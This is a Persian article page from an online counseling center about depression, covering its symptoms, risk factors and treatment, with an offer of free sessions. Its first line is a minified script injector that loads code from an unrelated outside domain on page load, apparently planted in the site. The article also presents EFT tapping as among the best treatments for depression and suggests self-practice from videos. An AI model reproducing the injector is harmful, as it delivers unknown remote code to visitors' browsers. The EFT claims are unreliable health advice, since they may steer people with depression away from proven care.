;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); اختلال افسردگی؛ علائم و درمان | مرکز مشاوره آنلاین روان‌یاری
درمان افسردگی

اختلال افسردگی؛ علائم و درمان

میزان پیشرفت خواندن شما

فهرست مطالب

افسردگی را می‌توان یک نوع اختلال شایع و جدی دانست که این روزها رواج زیادی پیدا کرده است. این اختلال روانی می‌تواند بر طرز تفکر و نحوه عملکرد فرد اثر بگذارد. البته اگر خودتان یا یکی از نزدیکانتان از این مسئله رنج می‌برید، جای هیچ گونه نگرانی نیست. زیرا افسردگی به کمک متدهای مختلف قابل درمان بوده و فرد می‌تواند پس از درمان به زندگی عادی خود برگردد. معمولا افراد افسرده مدام احساس غم و اندوه دارند. هم‌چنین نسبت به فعالیت‌هایی که قبلا علاقه‌مند به آن‌ها بوده‌اند، اشتیاق خود را از دست می‌دهند. این موارد بر مشکلات جسمی، عاطفی و… فرد می‌افزایند و بازدهی فعالیت‌های شخص افسرده را کاهش می‌دهند. به همین جهت بهتر است با علائم این اختلال و راه‌های درمانی آن بیشتر آشنا شوید.

از کجا بفهمیم افسردگی داریم؟

افسردگی همیشه میزان مشخصی ندارد. سطح درگیری افراد با این اختلال طیف‌های مختلفی دارد. بنابراین ممکن است خفیف، متوسط و حتی شدید باشد. در این بخش برخی از علائم افسردگی را مطرح می‌کنیم. افراد افسرده خلق و خوی غمگینی دارند. بعد از بروز اختلال به همه چیز بی اشتیاق می‌شوند و بخش بزرگی از لذت‌های زندگی را از دست می‌دهند. معمولا افراد افسرده تغییراتی در میزان اشتهای خود پیدا می‌کنند و با کاهش یا افزایش وزن مواجه می‌شوند. کسانی که افسرده هستند با اینکه تمایل دارند بیشتر روز را در خواب باشند، اما باز هم خواب راحتی ندارند. به همین دلیل با از دست دادن انرژی و افزایش خستگی روبرو می‌شوند.

گاهی اوقات فعالیت‌های بدنی معمولی مثل  قدم زدن بی هدف و… با شدت خاصی در افراد دارای افسردگی دیده می‌شود. افراد افسرده در تفکر، تمرکز و تصمیم گیری دچار مشکل هستند و همواره احساس بی ارزشی یا گناه می‌کنند. در بسیاری از افراد افسرده تمایلات خطرناکی مثل تمایل به مصرف داروهای آرام بخش، مواد مخدر، مسکرات، خودکشی و… دیده می‌شود. معمولا این علائم باید حداقل ۲ هفته در فرد دیده شوند. علائم مذکور در صورتی که عملکرد قبلی و معمولی زندگی فرد را تحت تاثیر قرار ندهند، خطرناک نیستند. برخی شرایط جسمی خاص مثل مشکلات تیروئیدی، تومورهای مغزی، کمبود ویتامین و… می‌توانند در تشدید میزان افسردگی فرد موثر باشند.

عوامل خطری که شما را افسرده می‌کنند‌

عوامل خطری که شما را افسرده می‌کنند‌

افسردگی همان‌طور که قبلا هم بیان کردیم می‌تواند هر کسی را تحت تاثیر خود قرار دهد. ممکن است فردی از نظر ما در شرایط ایده‌آلی زندگی کند. با این حال باز هم ممکن است که دچار اختلال افسردگی شود. عوامل مختلفی می‌توانند در بروز این مشکل روانی موثر باشند. یک عامل، عامل بیوشیمی است. تفاوت مابین برخی از مواد شیمیایی در مغز ممکن است منجر به تشدید علائم این اختلال شود. ژنتیک هم در این میان بی تاثیر نیست. برای مثال طبق تحقیقات اگر یکی از دوقلوهای همسان افسردگی داشته باشد، دیگری هم ۷۰ درصد در معرض ابتلاء قرار خواهد گرفت. مشکلات مربوط به شخصیت فرد مثل ضعف اعتماد به نفس و عزت نفس نیز می‌توانند به صورت مستقیم بر روی افسرده شدن فرد اثر بگذارند. محیط هم عامل خطر مهمی در بروز اختلالات این چنینی است. کسانی که به صورت مداوم در معرض خشونت، بی توجهی، سوء استفاده و فقر هستند احتمال افسرده شدن آن‌ها هم بالاتر است.

  خشم

برای درمان افسردگی چه باید کرد؟

درمان افسردگی همواره نیاز به همکاری خود فرد افسرده و نزدیکان او با درمانگر دارد. یکی از تکنیک‌های مناسب برای درمان این اختلال، تکنیک EFT  است. این تکنیک را به عنوان روشی برای رها شدن از احساسات می‌دانند که به تکنیک ضربه زدن هم معروف است. اگر دردها و فشارهایی که در معرض آن‌ها قرار گرفته‌اید، عمیق بوده‌اند EFT  یکی از بهترین راه‌های درمان آلام شما است. در این تکنیک به نقاط کلیدی بدن ضربات آرامی وارد می‌شوند. ترتیب و توالی ضربه‌ها در این تکنیک اهمیت زیادی دارند.

با یک جست و جوی ساده می‌توانید خودتان هم فیلم‌های آموزشی در این زمینه را پیدا کنید و همراه با آن‌ها تمرین کنید. در EFT  فرد می‌تواند با ذهن خود ارتباط بهتری بگیرد و به درمان دردهایش بپردازد. ذهن انسان همواره مقاومت زیادی در برابر تغییر نشان می‌دهد. به همین جهت هم ریشه‌ی بسیاری از دردهای انسان ذهن او و ترس‌ها و نگرانی‌هایی است که در آن می‌پروراند. به کمک EFT  می‌توانید ذهن خود را مجبور کنید که موضع جدیدی در مقابل ترس یا نگرانی بگیرد و مثبت اندیشانه عمل کند. در حقیقت من برتر شما برای حل مشکل به کمکتان خواهد آمد.

اختلالات روانی

کلام آخر ​

طبق برخی از آمارها افسردگی از هر ۱۵ نفر یک نفر را درگیر خود می‌کند. بنابراین احتمال اینکه هر کدام از ما در طول زندگی خود دوره‌ای را با این اختلال سر کنیم وجود دارد. افسرده شدن فرد ربطی به سن و سال او ندارد. بنابراین در هر سنی ممکن است شخص دچار این اختلال شود. اما معمولا این اختلال در میان اقشار جوان و نوجوان که بحران‌های زیادی را پشت سر می‌گذارند، بیشتر دیده می‌شود. مطالعات دیگری نیز نشان داده اند که حدود یک سوم از زنان در طول دوران زندگی خود حداقل یک دوره به خصوصی افسرده می‌شوند. زمانی که بستگان درجه یک فردی مثل والدین، فرزندان، خواهر، برادر و… این مشکل را دارند، احتمال افزایش میزان وراثت پذیری وجود دارد. این افراد با استفاده از تکنیک‌های نوینی مثل EFT  از طریق ارتباط با ذهن می‌توانند مشکلات مربوط به اختلالات روانی نظیر افسردگی را درمان کنند.

منبع: مرکز مشاوره روان‌یاری

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.